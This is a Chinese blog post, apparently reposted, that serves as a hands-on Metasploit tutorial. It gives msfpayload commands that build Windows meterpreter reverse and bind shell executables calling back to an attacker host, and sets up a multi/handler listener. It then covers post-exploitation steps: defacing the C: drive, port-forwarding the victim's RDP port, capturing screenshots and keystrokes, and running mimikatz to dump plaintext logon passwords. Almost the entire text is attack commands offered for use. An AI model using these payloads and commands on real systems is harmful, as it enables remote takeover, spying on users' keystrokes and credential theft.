kali生成shell监听目标主机

生成监听用的shell.exe:

reverse_tcp(反向连接)

path : payload/windows/meterpreter/reverse_tcp

msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.2 LPORT=8080 X > ~/Desktop/shell.exe

 

reverse_http/https(反向连接)

path:payload/windows/meterpreter/reverse_http/https

msfpayload windows/meterpreter/reverse_https LHOST=192.168.1.2 LPORT=8080 X > ~/Desktop/shell.exe

通过http/https的方式反向连接,在网速慢的情况下不稳定,在某博客上看到https如果反弹没有收到数据,可以将监听端口换成443试试。

 

bind_tcp(正向连接)

path : payload/windows/meterpreter/bind_tcp

正向连接shell,因为在内网跨网段时无法连接到attack的机器,所以在内网中经常会使用,不需要设置LHOST。

 

 

利用shell.exe监听:

msf > use exploit/multi/handler

msf exploit(handler) > set payload windows/meterpreter/reverse_tcp

msf exploit(handler) > set LHOST 192.168.1.2

msf exploit(handler) > set LPORT 8080

msf exploit(handler) > exploit -j

msf exploit(handler) >sessions

 

基本命令:

enter image description here

常用命令:

background:将当前会话放置后台
load/use:加载模块
Interact:切换进一个信道
migrate:迁移进程
run:执行一个已有的模块,这里要说的是输入run后按两下tab,会列出所有的已有的脚本,常用的有autoroute,hashdump,arp_scanner,multi_meter_inject等。
Resource:执行一个已有的rc脚本。

写入文件夹:
meterpreter > pwd
meterpreter > cd C:\\
meterpreter > pwd
meterpreter > mkdir Hacked by AutoRoot
meterpreter > ls

 

写入内容:

edit + 文件,调用vi编辑。

 

网络相关:

网络命令则有列出ip信息(ipconfig),展示修改路由表(route),还有端口转发(portfwd)

meterpreter > portfwd
meterpreter > portfwd add -l 1314 -p 3389 -r 192.168.1.2

在建立规则之后就可以连接本地1314端口,这样远程的3389端口就转发出来了

 

键盘监听:

meterpreter > screenshot
meterpreter > keyscan_start
meterpreter > keyscan_dump

注意一下windows会话窗口的概念,windows桌面划分为不同的会话(session),以便于与windows交互。会话0代表控制台,1,2 代表远程桌面。所以要截获键盘输入必须在0中进行。可 以使用getdesktop查看或者截张图试试。否则使用setdesktop切换。

如果不行就切换到explorer.exe进程中,这样也可以监听到远程桌面连接进来之后的键盘输入数据。

 

mimikatz:

抓取明文

第一条:privilege::debug
                //提升权限
第二条:sekurlsa::logonpasswords
              //抓取密码

 

 

 



 

转载于:https://www.cnblogs.com/winalva/p/4039339.html

  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值